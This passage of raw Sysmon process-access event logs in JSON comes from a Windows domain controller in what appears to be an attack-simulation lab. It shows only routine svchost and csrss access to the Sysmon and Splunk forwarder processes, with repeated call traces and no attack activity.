06:59:00.506","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6748,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6749,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6750,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\W